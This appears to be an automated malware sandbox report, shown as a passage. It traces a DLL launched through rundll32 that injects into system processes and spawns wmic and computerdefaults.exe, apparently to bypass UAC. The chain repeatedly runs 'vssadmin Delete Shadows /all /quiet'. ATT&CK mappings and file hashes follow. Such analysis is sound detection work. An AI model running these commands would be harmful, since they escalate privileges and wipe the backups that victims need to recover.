      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9124b46f8,0x7ff9124b4708,0x7ff9124b4718
      4⤵
      PID:1980
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1956 /prefetch:2
      4⤵
      PID:3164
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4980
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2964 /prefetch:8
      4⤵
      PID:1096
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
      4⤵
      PID:5008
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
      4⤵
      PID:2732
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
      4⤵
      PID:5208
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
      4⤵
      PID:5416
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
      4⤵
      PID:4564
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:992
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 /prefetch:8
      4⤵
      PID:5488
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1376
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
      4⤵
      PID:292
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1
      4⤵
      PID:4512
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1320 /prefetch:1
      4⤵
      PID:5960
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1840 /prefetch:1
      4⤵
      PID:4588
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,9173681924167409873,13856356842200054921,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3900 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5996
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:992
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1064
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2064
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4320
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4600
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4328

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2672
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3780
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3916
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4436
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3712
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1272
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2912
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4104
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4316

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3076
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4956
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3304
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1336
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2232

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2608
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2580
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1340

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2120
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2024
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3388
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2068
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4652

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3084
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2668
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4784
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4792
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3260

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:788

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4008
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3576
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5028

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3908

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3580
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\7f786f98ee0c469c2a7eb81cce8f44c6.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3148
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:3504
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4404
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:4608
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:992
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2532
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4088
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4408

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4868
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3156
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5668

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:488
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3320
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5660

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:904
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4040
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5640

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1100
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3564
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5748

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1808
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1000
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5756

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4024
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2960
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5968

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2900
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5024
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5624

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3840
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3760
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5872

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4284
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4832
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6008

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2544
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4320
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5132
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6056

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1744
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5336
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6112

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4848
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5208
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6104

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2592
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:832
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4564

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3756
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5028
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2980

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4724
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5216
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1664

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5344
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5400
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3808

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5472
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:988
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4848

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5524
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5356
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1604

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5132

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4652

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:3504

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1904

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4548

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5016

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:208

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4332
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:3916

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1336

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3724

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5992
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4316

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4484

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4956
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5028

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4548

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1808

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4724

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5788

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5392

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5812

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6100

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
efc9c7501d0a6db520763baad1e05ce8

SHA1
60b5e190124b54ff7234bb2e36071d9c8db8545f

SHA256
7af7b56e2f0a84ae008785726f3404eb9001baa4b5531d0d618c6bdcb05a3a7a

SHA512
